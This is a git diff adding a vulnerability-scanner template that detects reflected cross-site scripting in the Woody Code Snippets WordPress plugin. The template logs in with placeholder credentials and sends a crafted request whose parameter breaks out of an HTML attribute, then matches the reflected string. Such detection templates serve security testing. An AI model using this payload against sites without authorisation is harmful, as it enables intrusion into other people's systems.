diff --git a/vulnerabilities/wordpress/wp-insert-php-xss.yaml b/vulnerabilities/wordpress/wp-insert-php-xss.yaml
new file mode 100644
index 0000000000..afe2b16ec3
--- /dev/null
+++ b/vulnerabilities/wordpress/wp-insert-php-xss.yaml
@@ -0,0 +1,46 @@
+id: wp-insert-php-xss
+
+info:
+ name: Woody Code Snippets < 2.4.6 - Reflected Cross-Site Scripting
+ author: Akincibor,DhiyaneshDk
+ severity: medium
+ description: The plugin does not escape a generated URLs before outputting them back in an attribute, leading to Reflected Cross-Site Scripting
+ reference:
+ - https://wpscan.com/vulnerability/6d6761b7-0c17-4428-8748-2179732030a3
+ metadata:
+ verified: true
+ tags: wp-plugin,xss,wp,wordpress,authenticated,woody
+
+requests:
+ - raw:
+ - |
+ POST /wp-login.php HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{RootURL}}
+ Content-Type: application/x-www-form-urlencoded
+ Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+ log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+
+ - |
+ GET /wp-admin/edit.php?post_type=wbcr-snippets&page=import-wbcr_insert_php&a"> HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - 'import-wbcr_insert_php&a\">"'
+ - 'Woody Code Snippets Import'
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200